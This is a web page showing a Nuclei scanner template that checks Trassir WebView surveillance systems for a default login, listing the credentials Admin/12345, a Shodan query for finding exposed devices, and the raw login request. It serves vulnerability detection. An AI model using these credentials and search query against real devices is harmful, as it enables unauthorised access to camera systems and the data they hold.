Skip to content

Trassir WebView Default Login - Detect

ID: trassir-default-login

Severity: high

Author: gtrrnr,metascan

Tags: default-login,trassir,webview

Trassir WebView contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.

id: trassir-default-login
info:
name: Trassir WebView Default Login - Detect
author: gtrrnr,metascan
severity: high
description: |
Trassir WebView contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://confluence.trassir.com/display/TKB/How+to+reset+the+administrator+password+on+the+TRASSIR+NVR
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
verified: true
max-request: 1
shodan-query: title:"Trassir Webview"
tags: default-login,trassir,webview
http:
- raw:
- |
POST /login HTTP/1.1
Host: {{Hostname}}
username={{username}}&password={{password}}
attack: clusterbomb
payloads:
username:
- Admin
password:
- 12345
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"success" :'
- '"sid" :'
condition: and
case-insensitive: true
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
# digest: 4b0a00483046022100d099e6ac79f7de991c6109c2183b9a82abcff26175d98bdee70b6c91bbc775c30221009bed487367858fc6721b391213014f30dd2b3b51f3609a377ea33b8816da59c2:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/default-logins/trassir/trassir-default-login.yaml"

View on Github